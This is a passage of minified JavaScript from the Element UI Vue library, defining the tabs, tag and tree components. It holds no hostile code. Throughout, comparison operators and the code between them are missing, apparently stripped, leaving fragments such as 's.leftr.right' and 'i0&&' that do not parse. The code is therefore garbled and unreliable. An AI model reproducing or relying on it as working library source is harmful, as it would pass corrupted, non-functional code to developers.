e=this.$refs.navScroll["offset"+Tl(this.sizeName)],t=this.navOffset;if(t){var i=t>e?t-e:0;this.navOffset=i}},scrollNext:function(){var e=this.$refs.nav["offset"+Tl(this.sizeName)],t=this.$refs.navScroll["offset"+Tl(this.sizeName)],i=this.navOffset;if(!(e-i<=t)){var n=e-i>2*t?i+t:e-t;this.navOffset=n}},scrollToActiveTab:function(){if(this.scrollable){var e=this.$refs.nav,t=this.$el.querySelector(".is-active");if(t){var i=this.$refs.navScroll,n=-1!==["top","bottom"].indexOf(this.rootTabs.tabPosition),s=t.getBoundingClientRect(),r=i.getBoundingClientRect(),a=n?e.offsetWidth-r.width:e.offsetHeight-r.height,o=this.navOffset,l=o;n?(s.leftr.right&&(l=o+s.right-r.right)):(s.topr.bottom&&(l=o+(s.bottom-r.bottom))),l=Math.max(l,0),this.navOffset=Math.min(l,a)}}},update:function(){if(this.$refs.nav){var e=this.sizeName,t=this.$refs.nav["offset"+Tl(e)],i=this.$refs.navScroll["offset"+Tl(e)],n=this.navOffset;if(i0&&(this.navOffset=0)}},changeTab:function(e){var t=e.keyCode,i=void 0,n=void 0,s=void 0;-1!==[37,38,39,40].indexOf(t)&&(s=e.currentTarget.querySelectorAll("[role=tab]"),n=Array.prototype.indexOf.call(s,e.target),i=37===t||38===t?0===n?s.length-1:n-1:n0&&void 0!==arguments[0]&&arguments[0];if(this.$slots.default){var i=this.$slots.default.filter((function(e){return e.tag&&e.componentOptions&&"ElTabPane"===e.componentOptions.Ctor.options.name})),n=i.map((function(e){var t=e.componentInstance;return t})),s=!(n.length===this.panes.length&&n.every((function(t,i){return t===e.panes[i]})));(t||s)&&(this.panes=n)}else 0!==this.panes.length&&(this.panes=[])},handleTabClick:function(e,t,i){e.disabled||(this.setCurrentName(t),this.$emit("tab-click",e,i))},handleTabRemove:function(e,t){e.disabled||(t.stopPropagation(),this.$emit("edit",e.name,"remove"),this.$emit("tab-remove",e.name))},handleTabAdd:function(){this.$emit("edit",null,"add"),this.$emit("tab-add")},setCurrentName:function(e){var t=this,i=function(){t.currentName=e,t.$emit("input",e)};if(this.currentName!==e&&this.beforeLeave){var n=this.beforeLeave(e,this.currentName);n&&n.then?n.then((function(){i(),t.$refs.nav&&t.$refs.nav.removeFocus()}),(function(){})):!1!==n&&i()}else i()}},render:function(e){var t,i=this.type,n=this.handleTabClick,s=this.handleTabRemove,r=this.handleTabAdd,a=this.currentName,o=this.panes,l=this.editable,c=this.addable,u=this.tabPosition,h=this.stretch,d=l||c?e("span",{class:"el-tabs__new-tab",on:{click:r,keydown:function(e){13===e.keyCode&&r()}},attrs:{tabindex:"0"}},[e("i",{class:"el-icon-plus"})]):null,p={props:{currentName:a,onTabClick:n,onTabRemove:s,editable:l,type:i,panes:o,stretch:h},ref:"nav"},f=e("div",{class:["el-tabs__header","is-"+u]},[d,e("tab-nav",p)]),m=e("div",{class:"el-tabs__content"},[this.$slots.default]);return e("div",{class:(t={"el-tabs":!0,"el-tabs--card":"card"===i},t["el-tabs--"+u]=!0,t["el-tabs--border-card"]="border-card"===i,t)},["bottom"!==u?[f,m]:[m,f]])},created:function(){this.currentName||this.setCurrentName("0"),this.$on("tab-nav-update",this.calcPaneInstances.bind(null,!0))},mounted:function(){this.calcPaneInstances()},updated:function(){this.calcPaneInstances()}},Al=Ll,Vl=o(Al,Il,jl,!1,null,null,null);Vl.options.__file="packages/tabs/src/tabs.vue";var Bl=Vl.exports;Bl.install=function(e){e.component(Bl.name,Bl)};var zl=Bl,Rl=function(){var e=this,t=e.$createElement,i=e._self._c||t;return!e.lazy||e.loaded||e.active?i("div",{directives:[{name:"show",rawName:"v-show",value:e.active,expression:"active"}],staticClass:"el-tab-pane",attrs:{role:"tabpanel","aria-hidden":!e.active,id:"pane-"+e.paneName,"aria-labelledby":"tab-"+e.paneName}},[e._t("default")],2):e._e()},Hl=[];Rl._withStripped=!0;var Wl={name:"ElTabPane",componentName:"ElTabPane",props:{label:String,labelContent:Function,name:String,closable:Boolean,disabled:Boolean,lazy:Boolean},data:function(){return{index:null,loaded:!1}},computed:{isClosable:function(){return this.closable||this.$parent.closable},active:function(){var e=this.$parent.currentName===(this.name||this.index);return e&&(this.loaded=!0),e},paneName:function(){return this.name||this.index}},updated:function(){this.$parent.$emit("tab-nav-update")}},ql=Wl,Yl=o(ql,Rl,Hl,!1,null,null,null);Yl.options.__file="packages/tabs/src/tab-pane.vue";var Kl=Yl.exports;Kl.install=function(e){e.component(Kl.name,Kl)};var Ul,Gl,Xl=Kl,Zl={name:"ElTag",props:{text:String,closable:Boolean,type:String,hit:Boolean,disableTransitions:Boolean,color:String,size:String,effect:{type:String,default:"light",validator:function(e){return-1!==["dark","light","plain"].indexOf(e)}}},methods:{handleClose:function(e){e.stopPropagation(),this.$emit("close",e)},handleClick:function(e){this.$emit("click",e)}},computed:{tagSize:function(){return this.size||(this.$ELEMENT||{}).size}},render:function(e){var t=this.type,i=this.tagSize,n=this.hit,s=this.effect,r=["el-tag",t?"el-tag--"+t:"",i?"el-tag--"+i:"",s?"el-tag--"+s:"",n&&"is-hit"],a=e("span",{class:r,style:{backgroundColor:this.color},on:{click:this.handleClick}},[this.$slots.default,this.closable&&e("i",{class:"el-tag__close el-icon-close",on:{click:this.handleClose}})]);return this.disableTransitions?a:e("transition",{attrs:{name:"el-zoom-in-center"}},[a])}},Ql=Zl,Jl=o(Ql,Ul,Gl,!1,null,null,null);Jl.options.__file="packages/tag/src/tag.vue";var ec=Jl.exports;ec.install=function(e){e.component(ec.name,ec)};var tc=ec,ic=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{staticClass:"el-tree",class:{"el-tree--highlight-current":e.highlightCurrent,"is-dragging":!!e.dragState.draggingNode,"is-drop-not-allow":!e.dragState.allowDrop,"is-drop-inner":"inner"===e.dragState.dropType},attrs:{role:"tree"}},[e._l(e.root.childNodes,(function(t){return i("el-tree-node",{key:e.getNodeKey(t),attrs:{node:t,props:e.props,"render-after-expand":e.renderAfterExpand,"show-checkbox":e.showCheckbox,"render-content":e.renderContent},on:{"node-expand":e.handleNodeExpand}})})),e.isEmpty?i("div",{staticClass:"el-tree__empty-block"},[i("span",{staticClass:"el-tree__empty-text"},[e._v(e._s(e.emptyText))])]):e._e(),i("div",{directives:[{name:"show",rawName:"v-show",value:e.dragState.showDropIndicator,expression:"dragState.showDropIndicator"}],ref:"dropIndicator",staticClass:"el-tree__drop-indicator"})],2)},nc=[];ic._withStripped=!0;var sc="$treeNodeId",rc=function(e,t){t&&!t[sc]&&Object.defineProperty(t,sc,{value:e.id,enumerable:!1,configurable:!1,writable:!1})},ac=function(e,t){return e?t[e]:t[sc]},oc=function(e,t){var i=e;while(i&&"BODY"!==i.tagName){if(i.__vue__&&i.__vue__.$options.name===t)return i.__vue__;i=i.parentNode}return null},lc=function(){function e(e,t){for(var i=0;i0&&n.lazy&&n.defaultExpandAll&&this.expand(),Array.isArray(this.data)||rc(this,this.data),this.data){var a=n.defaultExpandedKeys,o=n.key;o&&a&&-1!==a.indexOf(this.key)&&this.expand(null,n.autoExpandParent),o&&void 0!==n.currentNodeKey&&this.key===n.currentNodeKey&&(n.currentNode=this,n.currentNode.isCurrent=!0),n.lazy&&n._initDefaultCheckedNode(this),this.updateLeafState()}}return e.prototype.setData=function(e){Array.isArray(e)||rc(this,e),this.data=e,this.childNodes=[];var t=void 0;t=0===this.level&&this.data instanceof Array?this.data:dc(this,"children")||[];for(var i=0,n=t.length;i1&&void 0!==arguments[1])||arguments[1],i=function i(n){for(var s=n.childNodes||[],r=!1,a=0,o=s.length;a-1&&t.splice(i,1);var n=this.childNodes.indexOf(e);n>-1&&(this.store&&this.store.deregisterNode(e),e.parent=null,this.childNodes.splice(n,1)),this.updateLeafState()},e.prototype.removeChildByData=function(e){for(var t=null,i=0;i0)n.expanded=!0,n=n.parent}i.expanded=!0,e&&e()};this.shouldLoadData()?this.loadData((function(e){e instanceof Array&&(i.checked?i.setChecked(!0,!0):i.store.checkStrictly||hc(i),n())})):n()},e.prototype.doCreateChildren=function(e){var t=this,i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};e.forEach((function(e){t.insertChild(St()({data:e},i),void 0,!0)}))},e.prototype.collapse=function(){this.expanded=!1},e.prototype.shouldLoadData=function(){return!0===this.store.lazy&&this.store.load&&!this.loaded},e.prototype.updateLeafState=function(){if(!0!==this.store.lazy||!0===this.loaded||"undefined"===typeof this.isLeafByUser){var e=this.childNodes;!this.store.lazy||!0===this.store.lazy&&!0===this.loaded?this.isLeaf=!e||0===e.length:this.isLeaf=!1}else this.isLeaf=this.isLeafByUser},e.prototype.setChecked=function(e,t,i,n){var s=this;if(this.indeterminate="half"===e,this.checked=!0===e,!this.store.checkStrictly){if(!this.shouldLoadData()||this.store.checkDescendants){var r=uc(this.childNodes),a=r.all,o=r.allWithoutDisable;this.isLeaf||a||!o||(this.checked=!1,e=!1);var l=function(){if(t){for(var i=s.childNodes,r=0,a=i.length;r0&&void 0!==arguments[0]&&arguments[0];if(0===this.level)return this.data;var t=this.data;if(!t)return null;var i=this.store.props,n="children";return i&&(n=i.children||"children"),void 0===t[n]&&(t[n]=null),e&&!t[n]&&(t[n]=[]),t[n]},e.prototype.updateChildren=function(){var e=this,t=this.getChildren()||[],i=this.childNodes.map((function(e){return e.data})),n={},s=[];t.forEach((function(e,t){var r=e[sc],a=!!r&&Object(b["arrayFindIndex"])(i,(function(e){return e[sc]===r}))>=0;a?n[r]={index:t,data:e}:s.push({index:t,data:e})})),this.store.lazy||i.forEach((function(t){n[t[sc]]||e.removeChildByData(t)})),s.forEach((function(t){var i=t.index,n=t.data;e.insertChild({data:n},i)})),this.updateLeafState()},e.prototype.loadData=function(e){var t=this,i=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{};if(!0!==this.store.lazy||!this.store.load||this.loaded||this.loading&&!Object.keys(i).length)e&&e.call(this);else{this.loading=!0;var n=function(n){t.loaded=!0,t.loading=!1,t.childNodes=[],t.doCreateChildren(n,i),t.updateLeafState(),e&&e.call(t,n)};this.store.load(this,n)}},lc(e,[{key:"label",get:function(){return dc(this,"label")}},{key:"key",get:function(){var e=this.store.key;return this.data?this.data[e]:null}},{key:"disabled",get:function(){return dc(this,"disabled")}},{key:"nextSibling",get:function(){var e=this.parent;if(e){var t=e.childNodes.indexOf(this);if(t>-1)return e.childNodes[t+1]}return null}},{key:"previousSibling",get:function(){var e=this.parent;if(e){var t=e.childNodes.indexOf(this);if(t>-1)return t>0?e.childNodes[t-1]:null}return null}}]),e}(),mc=fc,vc="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};function gc(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var bc=function(){function e(t){var i=this;for(var n in gc(this,e),this.currentNode=null,this.currentNodeKey=null,t)t.hasOwnProperty(n)&&(this[n]=t[n]);if(this.nodesMap={},this.root=new mc({data:this.data,store:this}),this.lazy&&this.load){var s=this.load;s(this.root,(function(e){i.root.doCreateChildren(e),i._initDefaultCheckedNodes()}))}else this._initDefaultCheckedNodes()}return e.prototype.filter=function(e){var t=this.filterNodeMethod,i=this.lazy,n=function n(s){var r=s.root?s.root.childNodes:s.childNodes;if(r.forEach((function(i){i.visible=t.call(i,e,i.data,i),n(i)})),!s.visible&&r.length){var a=!0;a=!r.some((function(e){return e.visible})),s.root?s.root.visible=!1===a:s.visible=!1===a}e&&(!s.visible||s.isLeaf||i||s.expand())};n(this)},e.prototype.setData=function(e){var t=e!==this.root.data;t?(this.root.setData(e),this._initDefaultCheckedNodes()):this.root.updateChildren()},e.prototype.getNode=function(e){if(e instanceof mc)return e;var t="object"!==("undefined"===typeof e?"undefined":vc(e))?e:ac(this.key,e);return this.nodesMap[t]||null},e.prototype.insertBefore=function(e,t){var i=this.getNode(t);i.parent.insertBefore({data:e},i)},e.prototype.insertAfter=function(e,t){var i=this.getNode(t);i.parent.insertAfter({data:e},i)},e.prototype.remove=function(e){var t=this.getNode(e);t&&t.parent&&(t===this.currentNode&&(this.currentNode=null),t.parent.removeChild(t))},e.prototype.append=function(e,t){var i=t?this.getNode(t):this.root;i&&i.insertChild({data:e})},e.prototype._initDefaultCheckedNodes=function(){var e=this,t=this.defaultCheckedKeys||[],i=this.nodesMap;t.forEach((function(t){var n=i[t];n&&n.setChecked(!0,!e.checkStrictly)}))},e.prototype._initDefaultCheckedNode=function(e){var t=this.defaultCheckedKeys||[];-1!==t.indexOf(e.key)&&e.setChecked(!0,!this.checkStrictly)},e.prototype.setDefaultCheckedKey=function(e){e!==this.defaultCheckedKeys&&(this.defaultCheckedKeys=e,this._initDefaultCheckedNodes())},e.prototype.registerNode=function(e){var t=this.key;if(t&&e&&e.data){var i=e.key;void 0!==i&&(this.nodesMap[e.key]=e)}},e.prototype.deregisterNode=function(e){var t=this,i=this.key;i&&e&&e.data&&(e.childNodes.forEach((function(e){t.deregisterNode(e)})),delete this.nodesMap[e.key])},e.prototype.getCheckedNodes=function(){var e=arguments.length>0&&void 0!==arguments[0]&&arguments[0],t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],i=[],n=function n(s){var r=s.root?s.root.childNodes:s.childNodes;r.forEach((function(s){(s.checked||t&&s.indeterminate)&&(!e||e&&s.isLeaf)&&i.push(s.data),n(s)}))};return n(this),i},e.prototype.getCheckedKeys=function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]&&arguments[0];return this.getCheckedNodes(t).map((function(t){return(t||{})[e.key]}))},e.prototype.getHalfCheckedNodes=function(){var e=[],t=function t(i){var n=i.root?i.root.childNodes:i.childNodes;n.forEach((function(i){i.indeterminate&&e.push(i.data),t(i)}))};return t(this),e},e.prototype.getHalfCheckedKeys=function(){var e=this;return this.getHalfCheckedNodes().map((function(t){return(t||{})[e.key]}))},e.prototype._getAllNodes=function(){var e=[],t=this.nodesMap;for(var i in t)t.hasOwnProperty(i)&&e.push(t[i]);return e},e.prototype.updateChildren=function(e,t){var i=this.nodesMap[e];if(i){for(var n=i.childNodes,s=n.length-1;s>=0;s--){var r=n[s];this.remove(r.data)}for(var a=0,o=t.length;a1&&void 0!==arguments[1]&&arguments[1],i=arguments[2],n=this._getAllNodes().sort((function(e,t){return t.level-e.level})),s=Object.create(null),r=Object.keys(i);n.forEach((function(e){return e.setChecked(!1,!1)}));for(var a=0,o=n.length;a-1;if(u){var h=l.parent;while(h&&h.level>0)s[h.data[e]]=!0,h=h.parent;l.isLeaf||this.checkStrictly?l.setChecked(!0,!1):(l.setChecked(!0,!0),t&&function(){l.setChecked(!1,!1);var e=function e(t){var i=t.childNodes;i.forEach((function(t){t.isLeaf||t.setChecked(!1,!1),e(t)}))};e(l)}())}else l.checked&&!s[c]&&l.setChecked(!1,!1)}},e.prototype.setCheckedNodes=function(e){var t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],i=this.key,n={};e.forEach((function(e){n[(e||{})[i]]=!0})),this._setCheckedKeys(i,t,n)},e.prototype.setCheckedKeys=function(e){var t=arguments.length>1&&void 0!==arguments[1]&&arguments[1];this.defaultCheckedKeys=e;var i=this.key,n={};e.forEach((function(e){n[e]=!0})),this._setCheckedKeys(i,t,n)},e.prototype.setDefaultExpandedKeys=function(e){var t=this;e=e||[],this.defaultExpandedKeys=e,e.forEach((function(e){var i=t.getNode(e);i&&i.expand(null,t.autoExpandParent)}))},e.prototype.setChecked=function(e,t,i){var n=this.getNode(e);n&&n.setChecked(!!t,i)},e.prototype.getCurrentNode=function(){return this.currentNode},e.prototype.setCurrentNode=function(e){var t=this.currentNode;t&&(t.isCurrent=!1),this.currentNode=e,this.currentNode.isCurrent=!0},e.prototype.setUserCurrentNode=function(e){var t=e[this.key],i=this.nodesMap[t];this.setCurrentNode(i)},e.prototype.setCurrentNodeKey=function(e){if(null===e||void 0===e)return this.currentNode&&(this.currentNode.isCurrent=!1),void(this.currentNode=null);var t=this.getNode(e);t&&this.setCurrentNode(t)},e}(),yc=bc,_c=function(){var e=this,t=this,i=t.$createElement,n=t._self._c||i;return n("div",{directives:[{name:"show",rawName:"v-show",value:t.node.visible,expression:"node.visible"}],ref:"node",staticClass:"el-tree-node",class:{"is-expanded":t.expanded,"is-current":t.node.isCurrent,"is-hidden":!t.node.visible,"is-focusable":!t.node.disabled,"is-checked":!t.node.disabled&&t.node.checked},attrs:{role:"treeitem",tabindex:"-1","aria-expanded":t.expanded,"aria-disabled":t.node.disabled,"aria-checked":t.node.checked,draggable:t.tree.draggable},on:{click:function(e){return e.stopPropagation(),t.handleClick(e)},contextmenu:function(t){return e.handleContextMenu(t)},dragstart:function(e){return e.stopPropagation(),t.handleDragStart(e)},dragover:function(e){return e.stopPropagation(),t.handleDragOver(e)},dragend:function(e){return e.stopPropagation(),t.handleDragEnd(e)},drop:function(e){return e.stopPropagation(),t.handleDrop(e)}}},[n("div",{staticClass:"el-tree-node__content",style:{"padding-left":(t.node.level-1)*t.tree.indent+"px"}},[n("span",{class:[{"is-leaf":t.node.isLeaf,expanded:!t.node.isLeaf&&t.expanded},"el-tree-node__expand-icon",t.tree.iconClass?t.tree.iconClass:"el-icon-caret-right"],on:{click:function(e){return e.stopPropagation(),t.handleExpandIconClick(e)}}}),t.showCheckbox?n("el-checkbox",{attrs:{indeterminate:t.node.indeterminate,disabled:!!t.node.disabled},on:{change:t.handleCheckChange},nativeOn:{click:function(e){e.stopPropagation()}},model:{value:t.node.checked,callback:function(e){t.$set(t.node,"checked",e)},expression:"node.checked"}}):t._e(),t.node.loading?n("span",{staticClass:"el-tree-node__loading-icon el-icon-loading"}):t._e(),n("node-content",{attrs:{node:t.node}})],1),n("el-collapse-transition",[!t.renderAfterExpand||t.childNodeRendered?n("div",{directives:[{name:"show",rawName:"v-show",value:t.expanded,expression:"expanded"}],staticClass:"el-tree-node__children",attrs:{role:"group","aria-expanded":t.expanded}},t._l(t.node.childNodes,(function(e){return n("el-tree-node",{key:t.getNodeKey(e),attrs:{"render-content":t.renderContent,"render-after-expand":t.renderAfterExpand,"show-checkbox":t.showCheckbox,node:e},on:{"node-expand":t.handleChildNodeExpand}})})),1):t._e()])],1)},xc=[];_c._withStripped=!0;var Cc={name:"ElTreeNode",componentName:"ElTreeNode",mixins:[O.a],props:{node:{default:function(){return{}}},props:{},renderContent:Function,renderAfterExpand:{type:Boolean,default:!0},showCheckbox:{type:Boolean,default:!1}},components:{ElCollapseTransition:Ke.a,ElCheckbox:In.a,NodeContent:{props:{node:{required:!0}},render:function(e){var t=this.$parent,i=t.tree,n=this.node,s=n.data,r=n.store;return t.renderContent?t.renderContent.call(t._renderProxy,e,{_self:i.$vnode.context,node:n,data:s,store:r}):i.$scopedSlots.default?i.$scopedSlots.default({node:n,data:s}):e("span",{class:"el-tree-node__label"},[n.label])}}},data:function(){return{tree:null,expanded:!1,childNodeRendered:!1,oldChecked:null,oldIndeterminate:null}},watch:{"node.indeterminate":function(e){this.handleSelectChange(this.node.checked,e)},"node.checked":function(e){this.handleSelectChange(e,this.node.indeterminate)},"node.expanded":function(e){var t=this;this.$nextTick((function(){return t.expanded=e})),e&&(this.childNodeRendered=!0)}},methods:{getNodeKey:function(e){return ac(this.tree.nodeKey,e.data)},handleSelectChange:function(e,t){this.oldChecked!==e&&this.oldIndeterminate!==t&&this.tree.$emit("check-change",this.node.data,e,t),this.oldChecked=e,this.indeterminate=t},handleClick:function(){var e=this.tree.store;e.setCurrentNode(this.node),this.tree.$emit("current-change",e.currentNode?e.currentNode.data:null,e.currentNode),this.tree.currentNode=this,this.tree.expandOnClickNode&&this.handleExpandIconClick(),this.tree.checkOnClickNode&&!this.node.disabled&&this.handleCheckChange(null,{target:{checked:!this.node.checked}}),this.tree.$emit("node-click",this.node.data,this.node,this)},handleContextMenu:function(e){this.tree._events["node-contextmenu"]&&this.tree._events["node-contextmenu"].length>0&&(e.stopPropagation(),e.preventDefault()),this.tree.$emit("node-contextmenu",e,this.node.data,this.node,this)},handleExpandIconClick:function(){this.node.isLeaf||(this.expanded?(this.tree.$emit("node-collapse",this.node.data,this.node,this),this.node.collapse()):(this.node.expand(),this.$emit("node-expand",this.node.data,this.node,this)))},handleCheckChange:function(e,t){var i=this;this.node.setChecked(t.target.checked,!this.tree.checkStrictly),this.$nextTick((function(){var e=i.tree.store;i.tree.$emit("check",i.node.data,{checkedNodes:e.getCheckedNodes(),checkedKeys:e.getCheckedKeys(),halfCheckedNodes:e.getHalfCheckedNodes(),halfCheckedKeys:e.getHalfCheckedKeys()})}))},handleChildNodeExpand:function(e,t,i){this.broadcast("ElTreeNode","tree-node-expand",t),this.tree.$emit("node-expand",e,t,i)},handleDragStart:function(e){this.tree.draggable&&this.tree.$emit("tree-node-drag-start",e,this)},handleDragOver:function(e){this.tree.draggable&&(this.tree.$emit("tree-node-drag-over",e,this),e.preventDefault())},handleDrop:function(e){e.preventDefault()},handleDragEnd:function(e){this.tree.draggable&&this.tree.$emit("tree-node-drag-end",e,this)}},created:function(){var e=this,t=this.$parent;t.isTree?this.tree=t:this.tree=t.tree;var i=this.tree;i||console.warn("Can not find node's tree.");var n=i.props||{},s=n["children"]||"children";this.$watch("node.data."+s,(function(){e.node.updateChildren()})),this.node.expanded&&(this.expanded=!0,this.childNodeRendered=!0),this.tree.accordion&&this.$on("tree-node-expand",(function(t){e.node!==t&&e.node.collapse()}))}},wc=Cc,kc=o(wc,_c,xc,!1,null,null,null);kc.options.__file="packages/tree/src/tree-node.vue";var Sc=kc.exports,Dc={name:"ElTree",mixins:[O.a],components:{ElTreeNode:Sc},data:function(){return{store:null,root:null,currentNode:null,treeItems:null,checkboxItems:[],dragState:{showDropIndicator:!1,draggingNode:null,dropNode:null,allowDrop:!0}}},props:{data:{type:Array},emptyText:{type:String,default:function(){return Object(vo["t"])("el.tree.emptyText")}},renderAfterExpand:{type:Boolean,default:!0},nodeKey:String,checkStrictly:Boolean,defaultExpandAll:Boolean,expandOnClickNode:{type:Boolean,default:!0},checkOnClickNode:Boolean,checkDescendants:{type:Boolean,default:!1},autoExpandParent:{type:Boolean,default:!0},defaultCheckedKeys:Array,defaultExpandedKeys:Array,currentNodeKey:[String,Number],renderContent:Function,showCheckbox:{type:Boolean,default:!1},draggable:{type:Boolean,default:!1},allowDrag:Function,allowDrop:Function,props:{default:function(){return{children:"children",label:"label",disabled:"disabled"}}},lazy:{type:Boolean,default:!1},highlightCurrent:Boolean,load:Function,filterNodeMethod:Function,accordion:Boolean,indent:{type:Number,default:18},iconClass:String},computed:{children:{set:function(e){this.data=e},get:function(){return this.data}},treeItemArray:function(){return Array.prototype.slice.call(this.treeItems)},isEmpty:function(){var e=this.root.childNodes;return!e||0===e.length||e.every((function(e){var t=e.visible;return!t}))}},watch:{defaultCheckedKeys:function(e){this.store.setDefaultCheckedKey(e)},defaultExpandedKeys:function(e){this.store.defaultExpandedKeys=e,this.store.setDefaultExpandedKeys(e)},data:function(e){this.store.setData(e)},checkboxItems:function(e){Array.prototype.forEach.call(e,(function(e){e.setAttribute("tabindex",-1)}))},checkStrictly:function(e){this.store.checkStrictly=e}},methods:{filter:function(e){if(!this.filterNodeMethod)throw new Error("[Tree] filterNodeMethod is required when filter");this.store.filter(e)},getNodeKey:function(e){return ac(this.nodeKey,e.data)},getNodePath:function(e){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in getNodePath");var t=this.store.getNode(e);if(!t)return[];var i=[t.data],n=t.parent;while(n&&n!==this.root)i.push(n.data),n=n.parent;return i.reverse()},getCheckedNodes:function(e,t){return this.store.getCheckedNodes(e,t)},getCheckedKeys:function(e){return this.store.getCheckedKeys(e)},getCurrentNode:function(){var e=this.store.getCurrentNode();return e?e.data:null},getCurrentKey:function(){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in getCurrentKey");var e=this.getCurrentNode();return e?e[this.nodeKey]:null},setCheckedNodes:function(e,t){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in setCheckedNodes");this.store.setCheckedNodes(e,t)},setCheckedKeys:function(e,t){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in setCheckedKeys");this.store.setCheckedKeys(e,t)},setChecked:function(e,t,i){this.store.setChecked(e,t,i)},getHalfCheckedNodes:function(){return this.store.getHalfCheckedNodes()},getHalfCheckedKeys:function(){return this.store.getHalfCheckedKeys()},setCurrentNode:function(e){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in setCurrentNode");this.store.setUserCurrentNode(e)},setCurrentKey:function(e){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in setCurrentKey");this.store.setCurrentNodeKey(e)},getNode:function(e){return this.store.getNode(e)},remove:function(e){this.store.remove(e)},append:function(e,t){this.store.append(e,t)},insertBefore:function(e,t){this.store.insertBefore(e,t)},insertAfter:function(e,t){this.store.insertAfter(e,t)},handleNodeExpand:function(e,t,i){this.broadcast("ElTreeNode","tree-node-expand",t),this.$emit("node-expand",e,t,i)},updateKeyChildren:function(e,t){if(!this.nodeKey)throw new Error("[Tree] nodeKey is required in updateKeyChild");this.store.updateChildren(e,t)},initTabIndex:function(){this.treeItems=this.$el.querySelectorAll(".is-focusable[role=treeitem]"),this.checkboxItems=this.$el.querySelectorAll("input[type=checkbox]");var e=this.$el.querySelectorAll(".is-checked[role=treeitem]");e.length?e[0].setAttribute("tabindex",0):this.treeItems[0]&&this.treeItems[0].setAttribute("tabindex",0)},handleKeydown:function(e){var t=e.target;if(-1!==t.className.indexOf("el-tree-node")){var i=e.keyCode;this.treeItems=this.$el.querySelectorAll(".is-focusable[role=treeitem]");var n=this.treeItemArray.indexOf(t),s=void 0;[38,40].indexOf(i)>-1&&(e.preventDefault(),s=38===i?0!==n?n-1:0:n-1&&(e.preventDefault(),t.click());var r=t.querySelector('[type="checkbox"]');[13,32].indexOf(i)>-1&&r&&(e.preventDefault(),r.click())}}},created:function(){var e=this;this.isTree=!0,this.store=new yc({key:this.nodeKey,data:this.data,lazy:this.lazy,props:this.props,load:this.load,currentNodeKey:this.currentNodeKey,checkStrictly:this.checkStrictly,checkDescendants:this.checkDescendants,defaultCheckedKeys:this.defaultCheckedKeys,defaultExpandedKeys:this.defaultExpandedKeys,autoExpandParent:this.autoExpandParent,defaultExpandAll:this.defaultExpandAll,filterNodeMethod:this.filterNodeMethod}),this.root=this.store.root;var t=this.dragState;this.$on("tree-node-drag-start",(function(i,n){if("function"===typeof e.allowDrag&&!e.allowDrag(n.node))return i.preventDefault(),!1;i.dataTransfer.effectAllowed="move";try{i.dataTransfer.setData("text/plain","")}catch(s){}t.draggingNode=n,e.$emit("node-drag-start",n.node,i)})),this.$on("tree-node-drag-over",(function(i,n){var s=oc(i.target,"ElTreeNode"),r=t.dropNode;r&&r!==s&&Object(Ae["removeClass"])(r.$el,"is-drop-inner");var a=t.draggingNode;if(a&&s){var o=!0,l=!0,c=!0,u=!0;"function"===typeof e.allowDrop&&(o=e.allowDrop(a.node,s.node,"prev"),u=l=e.allowDrop(a.node,s.node,"inner"),c=e.allowDrop(a.node,s.node,"next")),i.dataTransfer.dropEffect=l?"move":"none",(o||l||c)&&r!==s&&(r&&e.$emit("node-drag-leave",a.node,r.node,i),e.$emit("node-drag-enter",a.node,s.node,i)),(o||l||c)&&(t.dropNode=s),s.node.nextSibling===a.node&&(c=!1),s.node.previousSibling===a.node&&(o=!1),s.node.contains(a.node,!1)&&(l=!1),(a.node===s.node||a.node.contains(s.node))&&(o=!1,l=!1,c=!1);var h=s.$el.getBoundingClientRect(),d=e.$el.getBoundingClientRect(),p=void 0,f=o?l?.25:c?.45:1:-1,m=c?l?.75:o?.55:0:1,v=-9999,g=i.clientY-h.top;p=gh.height*m?"after":l?"inner":"none";var b=s.$el.querySelector(".el-tree-node__expand-icon").getBoundingClientRect(),y=e.$refs.dropIndicator;"before"===p?v=b.top-d.top:"after"===p&&(v=b.bottom-d.top),y.style.top=v+"px",y.style.left=b.right-d.left+"px","inner"===p?Object(Ae["addClass"])(s.$el,"is-drop-inner"):Object(Ae["removeClass"])(s.$el,"is-drop-inner"),t.showDropIndicator="before"===p||"after"===p,t.allowDrop=t.showDropIndicator||u,t.dropType=p,e.$emit("node-drag-over",a.node,s.node,i)}})),this.$on("tree-node-drag-end",(function(i){var n=t.draggingNode,s=t.dropType,r=t.dropNode;if(i.preventDefault(),i.dataTransfer.dropEffect="move",n&&r){var a={data:n.node.data};"none"!==s&&n.node.remove(),"before"===s?r.node.parent.insertBefore(a,r.node):"after"===s?r.node.parent.insertAfter(a,r.node):"inner"===s&&r.node.insertChild(a),"none"!==s&&e.store.registerNode(a),Object(Ae["removeClass"])(r.$el,"is-drop-inner"),e.$emit("node-drag-end",n.node,r.node,s,i),"none"!==s&&e.$emit("node-drop",n.node,r.node,s,i)}n&&!r&&e.$emit("node-drag-end",n.node,null,s,i),t.showDropIndicator=!1,t.draggingNode=null,t.dropNode=null,t.allowDrop=!0}))},mounted:function(){this.initTabIndex(),this.$el.addEventListener("keydown",this.handleKeydown)},updated:function(){this.treeItems=this.$el.querySelectorAll("[role=treeitem]"),this.checkboxItems=this.$el.querySelectorAll("input[type=checkbox]")}},$c=Dc,Oc=o($c,ic,nc,!1,null,null,null);Oc.options.__file="packages/tree/src/tree.vue";var Ec=Oc.exports;Ec.install=function(e){e.component(Ec.name,Ec)};var Tc=Ec,Pc=function(){var e=this,t=e.$createElement,i=e._self._c||t;return 